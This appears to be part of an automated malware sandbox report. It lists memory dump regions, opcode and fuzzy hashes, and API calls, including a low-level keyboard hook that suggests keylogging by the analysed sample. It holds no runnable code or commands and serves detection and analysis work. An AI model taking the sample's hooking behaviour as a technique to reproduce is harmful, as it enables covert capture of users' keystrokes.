                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.2394297795.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                                                Similarity
                                                                                • API ID: DispatcherExceptionUser
                                                                                • String ID:
                                                                                • API String ID: 6842923-0
                                                                                • Opcode ID: 8d805fd884ec295a1bfc2b2b810b41358406fc052531d2ef44e6b80a46161d64
                                                                                • Instruction ID: 93e231017f19488e893cbbf2409ed591fe52d8bd398d733254872d15c10feaa4
                                                                                • Opcode Fuzzy Hash: 8d805fd884ec295a1bfc2b2b810b41358406fc052531d2ef44e6b80a46161d64
                                                                                • Instruction Fuzzy Hash: D0F11774A04215CFCB26DB24C85479CB7BABF88305F20C4EAD50AA7355DB399E86CF06
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • KiUserExceptionDispatcher.NTDLL ref: 00369BEE
                                                                                • KiUserExceptionDispatcher.NTDLL ref: 0036A14D
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.2394297795.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                                                Similarity
                                                                                • API ID: DispatcherExceptionUser
                                                                                • String ID:
                                                                                • API String ID: 6842923-0
                                                                                • Opcode ID: ca94b1415e0f12d309a42700c360fbe7103a6d458878f3698d654e7977725a80
                                                                                • Instruction ID: 0b6a8f9bcf1931e9af031b6c2c0d0532658af5ff5c2750e2abb9287f81b61760
                                                                                • Opcode Fuzzy Hash: ca94b1415e0f12d309a42700c360fbe7103a6d458878f3698d654e7977725a80
                                                                                • Instruction Fuzzy Hash: 52F10774A04215CFCB66DB24C85479CB7BABF88305F20C4EAD50AA7355DB399E86CF06
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.2394297795.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: fe4171f8e3eb8f100261caa1dbdba683bc529439b0c51f8e9565151a9c812a5e
                                                                                • Instruction ID: 4c7bccd4659e536142f37e936a0c3ea2c09ca5d723e7ff632ef679276164fef1
                                                                                • Opcode Fuzzy Hash: fe4171f8e3eb8f100261caa1dbdba683bc529439b0c51f8e9565151a9c812a5e
                                                                                • Instruction Fuzzy Hash: DC423878A04218CFCB65DF24C85479DB7BABF89309F20C4E9D609A7255DB349E82CF46
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • KiUserExceptionDispatcher.NTDLL ref: 0036A14D
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.2394297795.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                                                Similarity
                                                                                • API ID: DispatcherExceptionUser
                                                                                • String ID:
                                                                                • API String ID: 6842923-0
                                                                                • Opcode ID: dd05f54d7c5a50dc8b731ba72cb8fd9e8432910a131e09f9a75bf1919d254087
                                                                                • Instruction ID: 89130adf39aa7f7cc7e4daedaac5b2d0ae0e7075ab882bd74d0546c3d32b08ab
                                                                                • Opcode Fuzzy Hash: dd05f54d7c5a50dc8b731ba72cb8fd9e8432910a131e09f9a75bf1919d254087
                                                                                • Instruction Fuzzy Hash: 5DF11874A04215CFCB26DB24C85479CB7BABF88309F20C4EAD509A7355DB399E86CF06
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • KiUserExceptionDispatcher.NTDLL ref: 0036A14D
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.2394297795.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                                                Similarity
                                                                                • API ID: DispatcherExceptionUser
                                                                                • String ID:
                                                                                • API String ID: 6842923-0
                                                                                • Opcode ID: 7fdd2f0a746b4d26663a8c2899bee51bd1aa2d844d18d7f4e6e2c276a3f03e83
                                                                                • Instruction ID: e6f5ebced671c7792c711456664f9da1d99255c1394eec54871e56e5c36161f2
                                                                                • Opcode Fuzzy Hash: 7fdd2f0a746b4d26663a8c2899bee51bd1aa2d844d18d7f4e6e2c276a3f03e83
                                                                                • Instruction Fuzzy Hash: 9EE10674A04215CFCB66DB24C85479CB7BABF88305F20C4EAD50AA7355DB399E86CF06
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • KiUserExceptionDispatcher.NTDLL ref: 0036A14D
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.2394297795.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                                                Similarity
                                                                                • API ID: DispatcherExceptionUser
                                                                                • String ID:
                                                                                • API String ID: 6842923-0
                                                                                • Opcode ID: a1db6e77bc0508135dd487077bee21588d7bb6c0e44d8e3235a5816024abbbdd
                                                                                • Instruction ID: aa74e9f3ba397d280746cdc88ee9b578684eeaaa6041a94c40c667c2026499b7
                                                                                • Opcode Fuzzy Hash: a1db6e77bc0508135dd487077bee21588d7bb6c0e44d8e3235a5816024abbbdd
                                                                                • Instruction Fuzzy Hash: D6E10674A04215CFCB66DB24C85479CB7BAAF88305F20C4EAD50AE7355DB399E86CF06
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • KiUserExceptionDispatcher.NTDLL ref: 0036A14D
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.2394297795.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                                                Similarity
                                                                                • API ID: DispatcherExceptionUser
                                                                                • String ID:
                                                                                • API String ID: 6842923-0
                                                                                • Opcode ID: 7e23189476323544efe306d57d4b18e458d6d13d5b05ab02c104f777a0677c86
                                                                                • Instruction ID: 47ac1db8dbdec4cc43167a8377354f375ebe89f8cf0e6104037fc8c3367a750f
                                                                                • Opcode Fuzzy Hash: 7e23189476323544efe306d57d4b18e458d6d13d5b05ab02c104f777a0677c86
                                                                                • Instruction Fuzzy Hash: 42E11674A04215CFCB66DB24C85479CB7BAAF88305F20C4EAD50AE7355DB399E86CF06
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • KiUserExceptionDispatcher.NTDLL ref: 0036A14D
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.2394297795.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                                                Similarity
                                                                                • API ID: DispatcherExceptionUser
                                                                                • String ID:
                                                                                • API String ID: 6842923-0
                                                                                • Opcode ID: fa6ec6142178f123dcb6a14eeb98927140baffb9d221018142fdeddb2aa1cfc0
                                                                                • Instruction ID: ea99660b435289e6671b3bb787a8277e7bb4a52b80d3794d9b05259e5e04353c
                                                                                • Opcode Fuzzy Hash: fa6ec6142178f123dcb6a14eeb98927140baffb9d221018142fdeddb2aa1cfc0
                                                                                • Instruction Fuzzy Hash: 7EE11674A04215CFCB66DB24C85479CB7BAAF88305F20C4EAD50AE7355DB399E86CF06
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • KiUserExceptionDispatcher.NTDLL ref: 0036A14D
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.2394297795.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                                                Similarity
                                                                                • API ID: DispatcherExceptionUser
                                                                                • String ID:
                                                                                • API String ID: 6842923-0
                                                                                • Opcode ID: c48f278e8165f7e2998f28ffa7824f479db0a6ae83d5e9b8939e3efdb0f34c6e
                                                                                • Instruction ID: ea1813ac323229841d4e5466025f6f706d8dfe0d7162b22f5089ecf06ae8ee1d
                                                                                • Opcode Fuzzy Hash: c48f278e8165f7e2998f28ffa7824f479db0a6ae83d5e9b8939e3efdb0f34c6e
                                                                                • Instruction Fuzzy Hash: A8D11774A04215CFCB66DB24C85479CB7BAAF88305F20C4EAD50AE7355DB399E86CF06
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • KiUserExceptionDispatcher.NTDLL ref: 0036A14D
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.2394297795.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                                                Similarity
                                                                                • API ID: DispatcherExceptionUser
                                                                                • String ID:
                                                                                • API String ID: 6842923-0
                                                                                • Opcode ID: bd64df389b5a7919b66f7dd3a74768e9a4452d6fbd8f6d29f6a314eec2ac9cdc
                                                                                • Instruction ID: a7f4bf348ac58babd18e1aafe96e0fcb670996cee23a4d9be89124587cf1069d
                                                                                • Opcode Fuzzy Hash: bd64df389b5a7919b66f7dd3a74768e9a4452d6fbd8f6d29f6a314eec2ac9cdc
                                                                                • Instruction Fuzzy Hash: 9AD12874A04215CFCB66DB24C85479CB7BAAF88305F20C4E9D50AE7395DB389E86CF06
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • KiUserExceptionDispatcher.NTDLL ref: 0036A14D
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.2394297795.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                                                Similarity
                                                                                • API ID: DispatcherExceptionUser
                                                                                • String ID:
                                                                                • API String ID: 6842923-0
                                                                                • Opcode ID: a9accc5df61d610c3502ec03d411cd86bd4904902420cb0d9632bf194083f878
                                                                                • Instruction ID: 27db17a640dca792635081a744d78318b7c085ae671833d3feba0ec504aa48e4
                                                                                • Opcode Fuzzy Hash: a9accc5df61d610c3502ec03d411cd86bd4904902420cb0d9632bf194083f878
                                                                                • Instruction Fuzzy Hash: 04D13774A04215CFCB66DB24C85479CB7BAAF88305F20C5E9D50AE7395DB389E86CF06
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • KiUserExceptionDispatcher.NTDLL ref: 0036A14D
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.2394297795.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                                                Similarity
                                                                                • API ID: DispatcherExceptionUser
                                                                                • String ID:
                                                                                • API String ID: 6842923-0
                                                                                • Opcode ID: 3b0339cb26c9c86d3d92fee4da99bb9b83ec6baf1ab9c7651a9c2a1a9185ff1c
                                                                                • Instruction ID: 2a73357ef2f61295362dde650aa0a1553514ee1f514cca7095388c93a94f8a21
                                                                                • Opcode Fuzzy Hash: 3b0339cb26c9c86d3d92fee4da99bb9b83ec6baf1ab9c7651a9c2a1a9185ff1c
                                                                                • Instruction Fuzzy Hash: 42C13774A04215CFCB66DB24C85479CB7BAAF88305F20C4E9D50AE7395DB389E86CF46
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • KiUserExceptionDispatcher.NTDLL ref: 0036A14D
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.2394297795.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                                                Similarity
                                                                                • API ID: DispatcherExceptionUser
                                                                                • String ID:
                                                                                • API String ID: 6842923-0
                                                                                • Opcode ID: 2dfb58a2db996a57ae151af3c60ff686fb4a7d62e5c2a2a8d7db8584c20063a4
                                                                                • Instruction ID: 5a7195d93ede5f00676fd695445220f3c01cdca84c326ddfb6027d4e608f21b0
                                                                                • Opcode Fuzzy Hash: 2dfb58a2db996a57ae151af3c60ff686fb4a7d62e5c2a2a8d7db8584c20063a4
                                                                                • Instruction Fuzzy Hash: BCC13874A04215CFCB65DB24C85479CB7BAAF88305F20C4E9D50AE7395DB389E86CF46
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • KiUserExceptionDispatcher.NTDLL ref: 0036A14D
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.2394297795.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                                                Similarity
                                                                                • API ID: DispatcherExceptionUser
                                                                                • String ID:
                                                                                • API String ID: 6842923-0
                                                                                • Opcode ID: 4792f19d42bed3c65218b1bb16d79ece35adbbb04f1732e3625ddb69bdf7b4a9
                                                                                • Instruction ID: 57a1c94e1c7c77d166980192d9d4e6b0d31ea2679e8053c1232b12e0bd0f4074
                                                                                • Opcode Fuzzy Hash: 4792f19d42bed3c65218b1bb16d79ece35adbbb04f1732e3625ddb69bdf7b4a9
                                                                                • Instruction Fuzzy Hash: 7FC13774A04219CFCB65DB64C85479CB7BAAF88305F20C4E9D50AE7385DB389E86CF46
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • KiUserExceptionDispatcher.NTDLL ref: 0036A14D
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.2394297795.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                                                Similarity
                                                                                • API ID: DispatcherExceptionUser
                                                                                • String ID:
                                                                                • API String ID: 6842923-0
                                                                                • Opcode ID: 01d2ea8d6689eb001f56503445ba1678a8851031d6a3e17f1f6ce4b666e31cd6
                                                                                • Instruction ID: 655341e21571ea29406db6787543fc6290cde1b9986593180913e05c18920ff4
                                                                                • Opcode Fuzzy Hash: 01d2ea8d6689eb001f56503445ba1678a8851031d6a3e17f1f6ce4b666e31cd6
                                                                                • Instruction Fuzzy Hash: 8EB14774A04219CFCB25DB24C85479CB7BAAF88305F20C5E9D10AE7385DB389E82CF06
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • KiUserExceptionDispatcher.NTDLL ref: 0036A14D
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.2394297795.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                                                Similarity
                                                                                • API ID: DispatcherExceptionUser
                                                                                • String ID:
                                                                                • API String ID: 6842923-0
                                                                                • Opcode ID: 4c91a5f87734b646034a331ce375de49108032dabe0def397583220312bf410d
                                                                                • Instruction ID: 84bb15959c39d779ffe80b3d342840e11c856d4080b182efe86f9ce600495da1
                                                                                • Opcode Fuzzy Hash: 4c91a5f87734b646034a331ce375de49108032dabe0def397583220312bf410d
                                                                                • Instruction Fuzzy Hash: C1B13774A04219CFCB25DB64C85479CB7BAAF88305F20C5E9D50AE7385DB389E86CF46
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • KiUserExceptionDispatcher.NTDLL ref: 0036A14D
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.2394297795.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                                                Similarity
                                                                                • API ID: DispatcherExceptionUser
                                                                                • String ID:
                                                                                • API String ID: 6842923-0
                                                                                • Opcode ID: fc273a231d85c69005b565d2e25c27c519dd9febcae3e1dd32a4d978f663ca98
                                                                                • Instruction ID: e5f322ec8b116187b2ee5b90c044c9073d7a95668f0fb01e47f38695ff75cb3a
                                                                                • Opcode Fuzzy Hash: fc273a231d85c69005b565d2e25c27c519dd9febcae3e1dd32a4d978f663ca98
                                                                                • Instruction Fuzzy Hash: 2BB14974A04215CFCB25DB64C85479CB7BAAF88305F20C5A9D50AE7385DB389E86CF46
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • KiUserExceptionDispatcher.NTDLL ref: 0036A14D
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.2394297795.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                                                Similarity
                                                                                • API ID: DispatcherExceptionUser
                                                                                • String ID:
                                                                                • API String ID: 6842923-0
                                                                                • Opcode ID: b66389cc5761e22c30bbf3b092efc79bf8c4f995ec52027aeba7334efafd82d7
                                                                                • Instruction ID: e2d3b63e41be2a2c9a8f905e54b5703590776fc536a7505e515ce541f1e674b2
                                                                                • Opcode Fuzzy Hash: b66389cc5761e22c30bbf3b092efc79bf8c4f995ec52027aeba7334efafd82d7
                                                                                • Instruction Fuzzy Hash: 91A15A74A44219CFCB65DF24C85479CB7BAAF88305F20C4A9D50AE7385DB389E86CF46
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • KiUserExceptionDispatcher.NTDLL ref: 0036A14D
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.2394297795.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                                                Similarity
                                                                                • API ID: DispatcherExceptionUser
                                                                                • String ID:
                                                                                • API String ID: 6842923-0
                                                                                • Opcode ID: 39702095252bc7ed780459522cbcb15b93701fb7c3a718a9950496dd25a64a33
                                                                                • Instruction ID: e65232b712f8ae12a72e60b5c2346c153caa46719be97d0e168e55d494f34a60
                                                                                • Opcode Fuzzy Hash: 39702095252bc7ed780459522cbcb15b93701fb7c3a718a9950496dd25a64a33
                                                                                • Instruction Fuzzy Hash: 35A15B74A00215CFCB65DF24C89479CB7BAAF88305F20C5A9D109E7355DB389E86CF46
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • KiUserExceptionDispatcher.NTDLL ref: 0036A14D
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.2394297795.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                                                Similarity
                                                                                • API ID: DispatcherExceptionUser
                                                                                • String ID:
                                                                                • API String ID: 6842923-0
                                                                                • Opcode ID: a6a778c7ad43fc704f0d06ee4f3b3ded1359f543b402646ea1a18a63eb8f8b94
                                                                                • Instruction ID: 20bc892138b7ded25c249491a28c919d2d8896b26bb60959931c43bab7a9c57d
                                                                                • Opcode Fuzzy Hash: a6a778c7ad43fc704f0d06ee4f3b3ded1359f543b402646ea1a18a63eb8f8b94
                                                                                • Instruction Fuzzy Hash: 2FA15A74A442198FCB25DF24C85479CB7BAAF88305F20C5A9D10AE7385DB389E86CF46
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • KiUserExceptionDispatcher.NTDLL ref: 0036A14D
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.2394297795.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                                                Similarity
                                                                                • API ID: DispatcherExceptionUser
                                                                                • String ID:
                                                                                • API String ID: 6842923-0
                                                                                • Opcode ID: 6880e021fd428d5edf00c95270209b36fc1dc1382d9be36a4283a4976f80c8a3
                                                                                • Instruction ID: 4d97a9334418b9a3bdf76c9a32514666afb6fa9f63d09340ef32f0706ca0579b
                                                                                • Opcode Fuzzy Hash: 6880e021fd428d5edf00c95270209b36fc1dc1382d9be36a4283a4976f80c8a3
                                                                                • Instruction Fuzzy Hash: 6B915C74A442198FCB65DF24C89479CB7BAEF88305F20C5A9D109E7385DB389E86CF46
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • KiUserExceptionDispatcher.NTDLL ref: 0036A14D
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.2394297795.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                                                Similarity
                                                                                • API ID: DispatcherExceptionUser
                                                                                • String ID:
                                                                                • API String ID: 6842923-0
                                                                                • Opcode ID: 8489d3e5d3f29430cfad6b6d2a7675f5ba2b00af1db76c95e4a58aa557c2b3b1
                                                                                • Instruction ID: ce723e086b6804b705d2ea619ad9cba5b29112779c87ebc59f6ed278772b5ed7
                                                                                • Opcode Fuzzy Hash: 8489d3e5d3f29430cfad6b6d2a7675f5ba2b00af1db76c95e4a58aa557c2b3b1
                                                                                • Instruction Fuzzy Hash: 02916B74A442158FCB65DF24C89479CB7BAEF88305F20C5A9D10AE7385DB389E86CF46
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 00A47571
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.2394684375.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false
                                                                                Similarity
                                                                                • API ID: QueryValue
                                                                                • String ID:
                                                                                • API String ID: 3660427363-0
                                                                                • Opcode ID: d3d6a049bfc770caf3276f0ddba5573f61ce4caac9aa748987272452badbad7d
                                                                                • Instruction ID: 42b31b89d42483b230eec044d2c7b89ce38e041ca614407b82f0f602fb29cdb1
                                                                                • Opcode Fuzzy Hash: d3d6a049bfc770caf3276f0ddba5573f61ce4caac9aa748987272452badbad7d
                                                                                • Instruction Fuzzy Hash: 9931F2B5D00258DFCB20CF99D884A8EFBF5BF88310F24842AE818AB310C7709905CFA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • SetWindowsHookExW.USER32(0000000D,00000000,?,?), ref: 00A4FAFB
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.2394684375.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false
                                                                                Similarity
                                                                                • API ID: HookWindows
                                                                                • String ID:
                                                                                • API String ID: 2559412058-0
                                                                                • Opcode ID: 38cfa4bcea68d6266be47042f9ca1a7d223daa4a770eac229f48e4ec2e3bb05a
                                                                                • Instruction ID: eb2b3862c92a7bcb2b27912057ff5e811f54cd864a1f11c116d1d0b5a468e082
                                                                                • Opcode Fuzzy Hash: 38cfa4bcea68d6266be47042f9ca1a7d223daa4a770eac229f48e4ec2e3bb05a
                                                                                • Instruction Fuzzy Hash: 862115759002099FCB14CF99D844BEEFBF5FB89324F14882AE459A7350C774A941CFA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.2394113181.000000000013D000.00000040.00000001.sdmp, Offset: 0013D000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 4e8d29a7d5e1e2fbaa489e17e9bc20aa449df8c48462a3870cbf620840e4c5fb
                                                                                • Instruction ID: d9946be2a93f09609eddf76c36f35c75af4173a67b6c287d0c37c115297a9df1
                                                                                • Opcode Fuzzy Hash: 4e8d29a7d5e1e2fbaa489e17e9bc20aa449df8c48462a3870cbf620840e4c5fb
                                                                                • Instruction Fuzzy Hash: 3121F575640244DFDB05DF50F9C4B26BFB6FB98328F24C569E8054B246C336E856CBA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.2394113181.000000000013D000.00000040.00000001.sdmp, Offset: 0013D000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 1b6cb7669d9a80e31717cc0775e39b9d343499fe504889630dece9ba943c6013
                                                                                • Instruction ID: 73d010ca4a8b61774703d49ecc0479d858433ada0ad6aaa79bcce570cc83ae31
                                                                                • Opcode Fuzzy Hash: 1b6cb7669d9a80e31717cc0775e39b9d343499fe504889630dece9ba943c6013
                                                                                • Instruction Fuzzy Hash: 2E2107B5504244DFDB15CF50F9C4B1ABF75FB98318F248569E8090B246C336D856CBA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.2394144964.000000000014D000.00000040.00000001.sdmp, Offset: 0014D000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: f9aecf7caece6dab14cf5b70df832d2bf2a7ee6c4dac825d9b9ff1c1b351380e
                                                                                • Instruction ID: 7bff19626d736e545c72e4c121963ca52ee67942c2bb8b04def682817a226191
                                                                                • Opcode Fuzzy Hash: f9aecf7caece6dab14cf5b70df832d2bf2a7ee6c4dac825d9b9ff1c1b351380e
                                                                                • Instruction Fuzzy Hash: 3721F275604204DFCF14CF60E984B16BBA5EB88314F24C9A9E8094B366C33AD847CBA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.2394144964.000000000014D000.00000040.00000001.sdmp, Offset: 0014D000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0fa30c8d5d25e9396eced7d23a13458c47b2624957e6417e2b154f1beb077024
                                                                                • Instruction ID: db7c136c1cfded35e5a06ac93b00bfd2e4701278b0de130ecb78f9bdb2705b01
                                                                                • Opcode Fuzzy Hash: 0fa30c8d5d25e9396eced7d23a13458c47b2624957e6417e2b154f1beb077024
                                                                                • Instruction Fuzzy Hash: 9D210775600204EFCB04CF60D5C4B16BBE5FB98324F24C969D8094B362C336E856CBA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.2394144964.000000000014D000.00000040.00000001.sdmp, Offset: 0014D000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: a93464262d722715b1cb377030a17e7f3a96675f73f9d73ee60ea154cce500f6
                                                                                • Instruction ID: 2f89ff7a68721151f1c51c362bef1c3747af0de5b3feeed9e8a6f3f706b20b91
                                                                                • Opcode Fuzzy Hash: a93464262d722715b1cb377030a17e7f3a96675f73f9d73ee60ea154cce500f6
                                                                                • Instruction Fuzzy Hash: A52162755083809FCB02CF14E994715BF71EB46314F28C5EAD8498F267C33AD856CB62
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.2394113181.000000000013D000.00000040.00000001.sdmp, Offset: 0013D000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 6286a3279e69299413871d4e25d69dc89c120fe7ccd7aa2d64d44a89ce99abad
                                                                                • Instruction ID: cbe4f710c131fc96d0e6782619637122defce7acd4f8a960d78c78714d42e7f6
                                                                                • Opcode Fuzzy Hash: 6286a3279e69299413871d4e25d69dc89c120fe7ccd7aa2d64d44a89ce99abad
                                                                                • Instruction Fuzzy Hash: 9A11E276544280CFCF02CF10E9C4B16BF72FB94324F24C6A9D8094B216C33AD95ACBA2
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.2394113181.000000000013D000.00000040.00000001.sdmp, Offset: 0013D000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 6286a3279e69299413871d4e25d69dc89c120fe7ccd7aa2d64d44a89ce99abad
                                                                                • Instruction ID: cf2d305b99e3eb2a9ab5a1fff32b97df49dade3f54be934d994472222e8a3414
                                                                                • Opcode Fuzzy Hash: 6286a3279e69299413871d4e25d69dc89c120fe7ccd7aa2d64d44a89ce99abad
                                                                                • Instruction Fuzzy Hash: 3A11E6B6504280CFCF12CF10E9C4B16BF72FB95314F24C5A9D8090B216C336D856CBA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.2394144964.000000000014D000.00000040.00000001.sdmp, Offset: 0014D000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: ea8ce52f3b615b8e449be01d93b9393bbd7ecd0d493f38c7c44483db944f7c15
                                                                                • Instruction ID: dbefd6cf80a4368ee270abc75b8d7f324a25cd5686c99f1925e76425de1786d0
                                                                                • Opcode Fuzzy Hash: ea8ce52f3b615b8e449be01d93b9393bbd7ecd0d493f38c7c44483db944f7c15
                                                                                • Instruction Fuzzy Hash: EA119D79504280DFCB05CF10D5C4B15FFA2FB85324F28C6A9D8494B666C33AE85ACBA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.2394113181.000000000013D000.00000040.00000001.sdmp, Offset: 0013D000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: f54f00dc04f9da8d4fdb7f3f3a8eb194158fe46bfaeeb02205a5e9be54661d59
                                                                                • Instruction ID: c8207fb7f74c998c75870ef36c1bcbf9533b3473b97e027b7863f902acff15df
                                                                                • Opcode Fuzzy Hash: f54f00dc04f9da8d4fdb7f3f3a8eb194158fe46bfaeeb02205a5e9be54661d59
                                                                                • Instruction Fuzzy Hash: F101A771404344DBD7208B65F988BA7BBDCEF51728F14C55AEE495B282C378AC44C6B1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.2394113181.000000000013D000.00000040.00000001.sdmp, Offset: 0013D000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 107e4bae5295f04e5749343e5ccb969989084340f03a47c3a329eaade0e3436e
                                                                                • Instruction ID: 090a2b69b00d800fdec55bac2037b01cfe824b14e9b8e0e8a9e501e3c8180dbf
                                                                                • Opcode Fuzzy Hash: 107e4bae5295f04e5749343e5ccb969989084340f03a47c3a329eaade0e3436e
                                                                                • Instruction Fuzzy Hash: 23F01275404744ABE7208E15E888B66FFD8EF91734F28C59AED485B286C379AC44CBB1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Non-executed Functions

                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.2394346599.0000000000402000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
